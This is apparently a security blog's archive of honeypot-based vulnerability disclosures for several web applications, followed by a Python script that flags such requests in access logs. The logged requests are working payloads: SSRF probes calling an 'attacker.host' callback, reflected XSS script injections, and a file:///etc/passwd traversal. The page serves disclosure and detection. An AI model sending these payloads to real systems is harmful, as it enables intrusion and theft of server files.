Archive for May, 2023

WebFTP /Api-back.php Multiple Parameter SSRF

May 30, 2023

A honeypot at a client site caught these being exploited in the wild on 2022-08-09. The vulnerable script is /Api-back.php in WebFTP; its ‘newname’ and ‘files’ parameters are vulnerable to SSRF.

REDACTED - - [20/Sep/2022:16:41:09 -0400] "POST /Api-back.php?newname=https%3A%2F%2F53678222-4159-46d0-b4b9-5067142a33c3.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 741 "scalaj-http/2.4.2"
REDACTED - - [20/Sep/2022:19:16:11 -0400] "POST /Api-back.php?files=https%3A%2F%2F303841cc-6c1b-4c99-a6f5-5f1f73f3ae66.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 734 "scalaj-http/2.4.2"

TbkTool Multiple Server-side Request Forgery (SSRF)

May 29, 2023

A honeypot at a client site caught these being exploited in the wild on 2022-08-09. The affected scripts are found in TbkTool, which is a Chinese “Taobao guest toolbox” (Google translated).

TbkTool /admin/AutoCreat-Zjy-TklRead-do.php autozjy_tkl Parameter SSRF

REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/AutoCreat-Zjy-TklRead-do.php?autozjy_tkl=https%3A%2F%2Fe919655e-f13c-4d6a-bcea-bba87c4ed230.attacker.host HTTP/1.1" 404 734 "scalaj-http/2.4.2"

TbkTool /admin/Creat-ActiveZjy-do.php Multiple Parameter SSRF

REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/Creat-ActiveZjy-do.php?active_dwzapi=https%3A%2F%2F9b08b39f-d677-4747-b449-06f4366f51f7.attacker.host HTTP/1.1" 404 737 "scalaj-http/2.4.2"
REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/Creat-ActiveZjy-do.php?active_yuming=https%3A%2F%2F879efee5-7942-4b3f-933d-95148e943dd9.attacker.host HTTP/1.1" 404 773 "scalaj-http/2.4.2"

TbkTool /admin/Creat-Zjy-do.php Multiple Parameter SSRF

REDACTED - - [09/Aug/2022:19:01:41 -0400] "POST /admin/Creat-Zjy-do.php?zjy_dwzapi=https%3A%2F%2F92700472-5b5a-4431-a9da-7b7bc11ce379.attacker.host HTTP/1.1" 404 737 "scalaj-http/2.4.2"
REDACTED - - [09/Aug/2022:19:01:41 -0400] "POST /admin/Creat-Zjy-do.php?zjy_yuming=https%3A%2F%2F3022c03f-2c8d-49dd-8147-ce4ef2b20491.attacker.host HTTP/1.1" 404 737 "scalaj-http/2.4.2"

JasperPHP /TJasper.class.php report Parameter Server-side Request Forgery (SSRF)

May 28, 2023

A honeypot at a client site caught this being exploited in the wild on 2022-08-09. The server-side request forgery (SSRF) flaw is in JasperPHP, a “Pure PHP library to read JRXML files made in ‘JasperSoft Studio’ and generate reports in PDF/XLS”.

REDACTED - - [09/Aug/2022:19:01:38 -0400] "GET /TJasper.class.php?report=https%3A%2F%2F505e8e67-4d55-4bc3-93dd-9d6f058c9bb0.attacker.host HTTP/1.1" 404 731 "scalaj-http/2.4.2"

NetBiblio /NetBiblio/search/shortviewNetBiblio searchTerm Parameter Reflected XSS

May 27, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-05-26. The vulnerability is in NetBiblio, “an integrated IT solution for libraries, media centers, documentation centers and archives”.

REDACTED - - [26/May/2023:13:31:24 -0600] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple HTTP/1.1" 404 773 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"

Microweber /demo/api/logout redirect_to Parameter XSS

May 26, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-05-26. CVE-2022-0560 was assigned a year ago for the same script and parameter, but for an open redirect, so this is different. That vulnerability was fixed in version 1.2.11, but it is not clear whether this XSS was fixed as a result.

REDACTED - - [26/May/2023:13:19:56 -0600] "GET /demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"

Wavemaker Studio /studioService.download inUrl Parameter Path Traversal Remote File Disclosure

May 6, 2023

A honeypot at a client site caught this being exploited in the wild on May 6, 2023. It appears to be a vulnerability in Wavemaker and does not appear in CVE. Since this was discovered in the wild and we don’t have time to check each issue, we’re not sure what versions are affected.

[redacted] - - [06/May/2023:04:23:46 -0600] "GET /wavemaker/studioService.download?inUrl=file///etc/passwd&method=getContent HTTP/1.1" 404 731 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
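As an added detection example (not part of the original posts), the following Python scans access-log lines like the ones in the entries above and flags the parameter patterns these captures share: an absolute URL in a parameter value (the SSRF callback probes against WebFTP, TbkTool and JasperPHP), a file scheme or dot-dot/etc/passwd value (the Wavemaker traversal probe), and script/alert payloads (the NetBiblio and Microweber XSS probes). The sample lines are copied from this page plus one constructed benign request; the log-format regex and the indicator patterns are assumptions to be adapted to your own logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined-format access log line: client, timestamp, request line, status.
# Assumption: this pattern fits the sample lines below; adapt it to your log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Indicator patterns (assumed, not from the page), checked in this order against
# each URL-decoded parameter value. First match wins.
INDICATORS = (
    # Absolute URL in a parameter value: the SSRF callback probe seen in the captures.
    ("ssrf", re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)),
    # file scheme (with or without the colon, as in the Wavemaker capture),
    # dot-dot segments, or /etc/passwd.
    ("path_traversal", re.compile(r'(^file:?/+|(^|/)\.\.(/|$)|/etc/passwd)', re.I)),
    # Reflected-XSS probes: script tags, alert() calls, event handlers, javascript: URLs.
    ("xss", re.compile(r'(<script|alert\s*\(|on\w+\s*=|javascript:)', re.I)),
)


def classify_value(value):
    """Return the indicator name matching a decoded parameter value, or None."""
    for name, pattern in INDICATORS:
        if pattern.search(value):
            return name
    return None


def parse_line(line):
    """Split one access-log line into client, path, status and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "client": m.group("client"),
        "timestamp": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        "status": int(m.group("status")),
        # parse_qsl percent-decodes values, so %3A%2F%2F becomes :// here.
        "params": parse_qsl(parts.query, keep_blank_values=True),
    }


def scan_log(lines):
    """Return one finding per (path, parameter) whose decoded value matches an indicator."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"]:
            kind = classify_value(value)
            if kind:
                findings.append({
                    "path": rec["path"], "param": key, "kind": kind,
                    "client": rec["client"], "status": rec["status"], "value": value,
                })
    return findings


# Sample input: six lines copied from this page (client field already redacted there)
# plus one constructed benign request at the end.
SAMPLE_LOG = [
    'REDACTED - - [20/Sep/2022:16:41:09 -0400] "POST /Api-back.php?newname=https%3A%2F%2F53678222-4159-46d0-b4b9-5067142a33c3.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 741 "scalaj-http/2.4.2"',
    'REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/AutoCreat-Zjy-TklRead-do.php?autozjy_tkl=https%3A%2F%2Fe919655e-f13c-4d6a-bcea-bba87c4ed230.attacker.host HTTP/1.1" 404 734 "scalaj-http/2.4.2"',
    'REDACTED - - [09/Aug/2022:19:01:38 -0400] "GET /TJasper.class.php?report=https%3A%2F%2F505e8e67-4d55-4bc3-93dd-9d6f058c9bb0.attacker.host HTTP/1.1" 404 731 "scalaj-http/2.4.2"',
    'REDACTED - - [26/May/2023:13:31:24 -0600] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple HTTP/1.1" 404 773 "-" "Mozilla/5.0"',
    'REDACTED - - [26/May/2023:13:19:56 -0600] "GET /demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 734 "-" "Mozilla/5.0"',
    '[redacted] - - [06/May/2023:04:23:46 -0600] "GET /wavemaker/studioService.download?inUrl=file///etc/passwd&method=getContent HTTP/1.1" 404 731 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/May/2023:13:00:00 -0600] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',  # constructed benign line
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["kind"]:15} {f["path"]} param={f["param"]} status={f["status"]} value={f["value"]}')
```

The status code is kept in each finding so that a probe against a path the server does not host (404, as in every capture above) can be triaged separately from the same request landing on a live install of the affected software.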
